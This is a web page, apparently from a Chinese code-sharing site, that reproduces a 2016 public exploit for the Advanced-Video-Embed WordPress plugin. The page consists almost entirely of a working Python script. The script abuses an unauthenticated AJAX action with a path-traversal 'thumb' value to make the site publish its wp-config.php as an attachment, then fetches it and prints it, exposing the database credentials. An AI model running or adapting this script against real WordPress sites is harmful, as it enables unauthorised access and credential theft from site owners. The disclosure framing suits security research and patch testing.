扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
#!/usr/bin/env python # Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation # Google Dork: N/A # Date: 04/01/2016 # Exploit Author: evait security GmbH # Vendor Homepage: arshmultani - http://dscom.it/ # Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/ # Version: 1.0 # Tested on: Linux Apache / WordPress 4.2.2 # Timeline # 03/24/2016 - Bug discovered # 03/24/2016 - Initial notification of vendor # 04/01/2016 - No answer from vendor, public release of bug # Vulnerable Code (/inc/classes/class.avePost.php) Line 57: #function ave_publishPost(){ #$title = $_REQUEST['title']; #$term = $_REQUEST['term']; #$thumb = $_REQUEST['thumb']; # <snip> # Line 78: #$image_data = file_get_contents($thumb); # POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH] # Exploit - Print the content of wp-config.php in terminal (default WordPress config) import random import urllib2 import re url = "http://127.0.0.1/wordpress" # insert url to wordpress randomID = long(random.random() * 100000000000000000L) objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php') content =objHtml.readlines() for line in content: numbers = re.findall(r'\d+',line) id = numbers[-1] id = int(id) / 10 objHtml = urllib2.urlopen(url + '/?p=' + str(id)) content = objHtml.readlines() for line in content: if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line: urls=re.findall('"(https?://.*?)"', line) print urllib2.urlopen(urls[0]).read() |
体验盒子
